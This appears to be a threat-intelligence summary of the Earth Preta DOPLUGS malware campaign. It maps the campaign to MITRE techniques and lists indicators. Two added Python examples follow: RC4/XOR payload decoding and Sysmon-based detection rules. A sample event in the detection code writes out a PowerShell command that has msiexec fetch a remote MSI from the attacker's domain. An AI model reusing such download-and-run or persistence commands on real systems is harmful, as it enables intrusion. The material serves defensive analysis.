Keypoints
- DOPLUGS is a custom PlugX downloader used by Earth Preta to fetch general PlugX payloads and implement limited backdoor commands rather than a full PlugX feature set.
- Initial access commonly uses spear‑phishing emails pointing to Google Drive-hosted, password-protected RAR archives that contain LNK shortcuts which invoke PowerShell to download an MSI.
- The MSI droppers (e.g., 6460c7.msi) extract a legitimate executable (OneNotem.exe), a malicious DLL (msi.dll), and an encrypted payload (NoteLogger.dat) and use DLL sideloading for execution and persistence.
- DOPLUGS implements a small backdoor command set (examples: 0x7002 to spawn a CMD shell, 0x3004 to download DLL/EXE/DAT payloads, 0x1007 to adjust network timeouts, and 0x1005 to remove persistence) and encrypts C2 packets with RC4 under a variable 0x20-byte key retrieved from the C&C server.
- The general PlugX variants delivered by DOPLUGS perform DLL loader sideloading using legitimate EXEs (e.g., adobe_licensing_wf_helper.exe, Avastsz.exe), inject into system processes (WerFault/svchost), and store encrypted configurations (type‑dependent RC4 keys like qwedfgx202211).
- A DOPLUGS variant integrates the KillSomeOne module, enabling USB worm behavior: copying disguised files to removable media, executing a launcher that sideloads a Go-compiled loader, stealing documents and system info, clearing prior PlugX traces, and scheduling tasks to enable Wi‑Fi.
MITRE Techniques
- [T1583.004] Acquire Infrastructure: Server – Earth Preta used hosted servers and domains for distribution and C2 (‘https://getfiledown[.]com/vgbskgyu’ and various C2 domains listed).
- [T1587.001] Develop Capabilities: Malware – The actor developed and customized downloader/backdoor tooling (DOPLUGS) derived from PlugX (‘we decided to give this piece of customized PlugX malware a new name: DOPLUGS’).
- [T1585.002] Establish Accounts: Email Accounts – The attack timeline and spear-phishing delivery imply attacker-controlled email accounts were used for targeting (‘spear-phishing emails sent to victims’).
- [T1588.002] Obtain Capabilities: Tool – Use of legitimate utilities and sideloading binaries (Adobe/Avast executables) to enable malware execution (‘legitimate executable for sideloading’).
- [T1608.001] Stage Capabilities: Upload Malware – Actors staged archives and MSI/EXE/DLL components on public hosting for victim download (‘Google Drive link that hosts a password-protected archive file, which will download DOPLUGS malware’).
- [T1608.005] Stage Capabilities: Link Target – Use of targeted decoy content (election, local projects) to link to victims (‘the files used for social engineering were related to current events… the Taiwanese presidential election’).
- [T1566.002] Phishing: Spearphishing Link – Initial access via emails containing Google Drive links to passworded RARs and LNK shortcuts (‘spear-phishing emails sent to victims are embedded with a Google Drive link that hosts a password-protected archive file’).
- [T1091] Replication Through Removable Media – KillSomeOne enables USB propagation by copying malicious components to removable drives (‘KillSomeOne module … specializes in USB infections’).
- [T1204.002] User Execution: Malicious File – Victims execute LNK or disguised USB launcher files, causing MSI download and execution (‘When the victim selects the LNK file, a MSI file will be downloaded’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – PlugX and DOPLUGS set registry Run keys and services for persistence (‘Creates registry Software\Microsoft\Windows\CurrentVersion\Run with name “Adobe Licensing Helper”‘).
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Loaders sideload malicious DLLs via legitimate EXEs (e.g., adobe_licensing_wf_helper.exe + libcef.dll) to run PlugX payloads (‘malicious loader’ and ‘legitimate executable for sideloading’).
- [T1053.005] Scheduled Task/Job: Scheduled Task – Malware creates scheduled tasks to enable Wi‑Fi and maintain connectivity (‘schtasks.exe /create … “Security WIFI Script”‘).
- [T1140] Deobfuscate/Decode Files or Information – Components decrypt encrypted payloads/configs (XOR and RC4 used) before execution (‘It decrypts the encrypted payload by XOR with the single key, 0x73’ and ‘RC4 algorithm, which is 0x20 bytes retrieved from the C&C server’).
- [T1036.005] Masquerading: Match Legitimate Name or Location – Malware uses legitimate-sounding filenames and copy locations to blend in (e.g., “Adobe Licensing Helper”, fake USB disk names) (‘The launcher pretends to be a fake USB disk to lure victims’).
- [T1070.009] Indicator Removal: Clear Persistence – KillSomeOne removes traces of previous PlugX infestations by deleting files, registry keys, processes, and scheduled tasks (‘removes all traces related to previous pieces of PlugX malware’).
- [T1564.001] Hidden Files and Directories – The worm hides malware and stolen documents and toggles Explorer settings to hide extensions and files (‘these registries are enabled to hide the file extension and the folders that contain malware and stolen documents’).
- [T1056.001] Input Capture: Keylogging – PlugX configuration includes keylogger file-extension targets for theft (‘File extensions that are read by the keylogger: *.doc*, *.pdf, *.xls, *.ppt*’).
- [T1083] File and Directory Discovery – Malware enumerates directories and files to collect documents from USB and local folders (‘checks the file extensions in these predefined folders’).
- [T1016.001] Internet Connection Discovery – Threads check connectivity (e.g., attempt to reach https://www.microsoft.com/) to decide collection behavior (‘If the connection succeeds in connecting to https://www.microsoft.com/’).
- [T1049] System Network Connections Discovery – Malware runs netstat and collects network info as part of victim data collection (‘%comspec% /q /c netstat -ano >> …’).
- [T1082] System Information Discovery – Systeminfo and other commands are executed to gather host details (‘systeminfo > “%~dp0AE353BBEB1C6603E_E.dat”‘).
- [T1012] Query Registry – Malware reads/writes registry values (e.g., NetworkVersion) to alter behavior and persistence (‘checks the value in registry (HKCU|HKLM)\System\CurrentControlSet\Control\NetworkVersion’).
- [T1005] Data from Local System – The collection thread copies local document files into staging folders for exfiltration (‘it will transfer the file to %userprofile%\AppData\Roaming\Render1.0’).
- [T1025] Data from Removable Media – The USB-stealing module harvests files from removable media and encrypts them for exfiltration (‘it will transfer the file to %userprofile%\AppData\Roaming\Render1.0 and empty the content of the original file’).
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communications and file downloads use HTTPS and web ports for staging and PlugX C2 (‘electrictulsa[.]com:443’ and web-based C2 domains listed).
- [T1573] Encrypted Channel – C2 traffic and payloads are encrypted; RC4 is used for packet encryption and other encrypted channels are present (‘it will be encrypted or decrypted with the RC4 algorithm’).
Indicators of Compromise
- [File hashes] Dropper and payload examples – 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321 (6460c7.msi), f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5 (msi.dll), and 15+ other hashes from the report.
- [Domains] Distribution and C2 – getfiledown[.]com (MSI download via LNK), web.bonuscave[.]com / www.markplay[.]net (PlugX C2), and other hosting domains such as electrictulsa[.]com.
- [IP addresses] C2 and staging hosts – 149[.]104[.]12[.]64:443 (used to host payloads), 45[.]83[.]236[.]105:443 (C2), and several other IPv4 C2/staging IPs listed.
- [File names] Decoys and components – decoy PDFs like 水源路二至五期整建住宅都市更新推動說明.pdf and Үер усны сэрэмжлүүлэг.pdf; dropped components OneNotem.exe, msi.dll, NoteLogger.dat, and MSI names like 6460c7.msi.
Earth Preta’s technical infection chain centers on weaponized LNK shortcuts wrapped in password‑protected RARs hosted via Google Drive. When a user opens the LNK, it runs PowerShell to call Windows Installer and fetch an MSI (e.g., from getfiledown[.]com); the MSI unpacks a legitimate executable, a malicious DLL, and an encrypted DAT payload (commonly OneNotem.exe, msi.dll, NoteLogger.dat) and uses DLL sideloading to execute the malicious loader and establish persistence via Run keys or services.
DOPLUGS itself is a lightweight downloader/backdoor: it supports RC4-encrypted C2 traffic using a variable key, and exposes a small command set (examples include 0x7002 to spawn a CMD shell, 0x3004 to download next-stage PlugX DLL/EXE/DAT, 0x1007 to set WinHTTP timeout/sleep values, and 0x1005 to remove persistence). The downloader retrieves one of two general PlugX types which perform DLL sideloading (adobe_licensing_wf_helper.exe + libcef.dll or Avastsz.exe + SZBrowser.dll), inject into system processes (WerFault.exe or svchost.exe), and use RC4/decryption keys (e.g., qwedfgx202211) for encrypted configurations and C2 lists.
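The two symmetric primitives named above (RC4 for C2 packets, single-byte XOR 0x73 for the KillSomeOne payload) are simple enough to reimplement for offline triage of a captured sample. The block below is an added example written for this page, not code from the Trend Micro report or from the malware itself: the 0x20-byte session key, the packet layout (a 2-byte little-endian command ID followed by a body) and the fake "NoteLogger.dat" bytes are all constructed assumptions for the demo.

```python
"""Added example (not the report's code): RC4 and XOR-0x73 helpers for unpacking
DOPLUGS artifacts offline. Key, packet layout and sample blobs are constructed."""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                            # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_single(data: bytes, key: int = 0x73) -> bytes:
    """Single-byte XOR as used by the Go-compiled KillSomeOne loader (key 0x73)."""
    return bytes(b ^ key for b in data)


def is_pe(buf: bytes) -> bool:
    """Cheap sanity check that a decrypted blob starts with an MZ header."""
    return buf[:2] == b"MZ"


# Constructed stand-in for an encrypted .dat payload: a minimal MZ/PE stub XORed with 0x73.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 12 + b"PE\x00\x00"
ENCRYPTED_DAT = xor_single(FAKE_PE)

# Constructed C2 exchange. The report says the 0x20-byte RC4 key comes from the C&C
# server; here it is simply bytes 0x00..0x1f. The 2-byte command-ID prefix is an
# assumed layout chosen for the demo, not a documented DOPLUGS packet format.
SESSION_KEY = bytes(range(0x20))
PLAIN_PACKET = (0x3004).to_bytes(2, "little") + b"https://example.invalid/next.dll"
C2_PACKET = rc4(SESSION_KEY, PLAIN_PACKET)


def decode_packet(key: bytes, packet: bytes) -> tuple[int, bytes]:
    """Strip the RC4 layer and split (command_id, body) under the assumed layout."""
    plain = rc4(key, packet)
    return int.from_bytes(plain[:2], "little"), plain[2:]


if __name__ == "__main__":
    cmd, body = decode_packet(SESSION_KEY, C2_PACKET)
    print(f"command 0x{cmd:04x} body={body!r}")
    print("decrypted .dat is PE:", is_pe(xor_single(ENCRYPTED_DAT)))
```

Because RC4 is a stream cipher, recovering the session key from one captured exchange (for example, from memory of the running process) lets an analyst replay every packet in the capture; the XOR stage has no key at all, so any .dat whose first two bytes XOR 0x73 to "MZ" is worth a closer look.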
Variants integrated the KillSomeOne USB module to expand infection vectors: a Go-compiled loader decrypts its payload with XOR(0x73), installs files into hidden folders on removable media, creates fake USB‑styled launchers to trick users, XOR-encrypts stolen documents before staging them for exfiltration, removes traces of prior PlugX instances, and can create scheduled tasks to enable Wi‑Fi. Detection and response should focus on LNK-launched PowerShell that invokes Windows Installer against a remote MSI, DLL sideloading by the Adobe/Avast/OneNote-named binaries from user-writable directories, Run-key and scheduled-task persistence under the names quoted above, RC4-encrypted outbound traffic, and autorun‑style file copying to removable media.
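The detection points in the paragraph above can be expressed as a few host-telemetry rules. The block below is an added example for this page, not tooling from the report: it runs four rules over constructed Sysmon-style events (field names follow Sysmon's schema; the file paths, SID, and scheduled-task action text are made up for the demo). The sideloading rule keys on the EXE/DLL pairs the report names but only fires when the DLL is loaded from outside the usual trusted directories, so the legitimate installs of those vendors' binaries do not alert.

```python
"""Added example (not from the report): toy detections for the DOPLUGS chain,
run over constructed Sysmon-style events (EventID 1 process create, 7 image load,
13 registry value set). All sample events below are made up."""
import re

# Legitimate-EXE / malicious-DLL pairs named in the report. The EXEs are real
# binaries, so the signal is the DLL being loaded from a user-writable directory
# next to the EXE rather than from a trusted install location.
SIDELOAD_PAIRS = {
    "onenotem.exe": "msi.dll",
    "adobe_licensing_wf_helper.exe": "libcef.dll",
    "avastsz.exe": "szbrowser.dll",
}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MSI_FROM_URL = re.compile(r"msiexec(\.exe)?\b.*\bhttps?://", re.I)
RUN_KEY = "\\currentversion\\run\\"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def detect(events: list[dict]) -> list[tuple[str, dict]]:
    """Return (rule_name, event) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:  # process creation
            cmd = ev.get("CommandLine", "")
            image = basename(ev["Image"])
            # LNK -> PowerShell -> Windows Installer fetching an MSI from a URL
            if image in ("powershell.exe", "msiexec.exe") and MSI_FROM_URL.search(cmd):
                hits.append(("powershell_msiexec_remote_msi", ev))
            # KillSomeOne's Wi-Fi enabling task, keyed on the quoted task name
            if image == "schtasks.exe" and "/create" in cmd.lower() \
                    and "security wifi script" in cmd.lower():
                hits.append(("schtasks_wifi_persistence", ev))
        elif eid == 7:  # image load
            dll = ev["ImageLoaded"]
            if SIDELOAD_PAIRS.get(basename(ev["Image"])) == basename(dll) \
                    and not in_trusted_dir(dll):
                hits.append(("dll_sideload_untrusted_dir", ev))
        elif eid == 13:  # registry value set
            target = ev["TargetObject"].lower()
            if RUN_KEY in target and target.endswith("adobe licensing helper"):
                hits.append(("run_key_adobe_licensing_helper", ev))
    return hits


# Constructed sample telemetry: one benign image load (Adobe DLL from Program Files)
# is included to show the trusted-directory guard.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "msiexec /i https://getfiledown[.]com/vgbskgyu /q"'},
    {"EventID": 7, "Image": "C:\\Users\\victim\\AppData\\Roaming\\OneNote\\OneNotem.exe",
     "ImageLoaded": "C:\\Users\\victim\\AppData\\Roaming\\OneNote\\msi.dll"},
    {"EventID": 7, "Image": "C:\\Program Files\\Adobe\\adobe_licensing_wf_helper.exe",
     "ImageLoaded": "C:\\Program Files\\Adobe\\libcef.dll"},
    {"EventID": 13, "Image": "C:\\Users\\victim\\AppData\\Roaming\\OneNote\\OneNotem.exe",
     "TargetObject": "HKU\\S-1-5-21-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe Licensing Helper"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'schtasks.exe /create /sc minute /mo 5 /tn "Security WIFI Script" /tr "<constructed action>"'},
]


if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule:34s} EventID={ev['EventID']} {basename(ev['Image'])}")
```

These rules match on the specific names the report documents, so they are narrow by design; the structural versions (any signed EXE loading a same-named DLL from %AppData%, any msiexec with a URL argument spawned from an Office or Explorer-launched PowerShell) catch the next rename at the cost of more tuning.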
Read more: https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html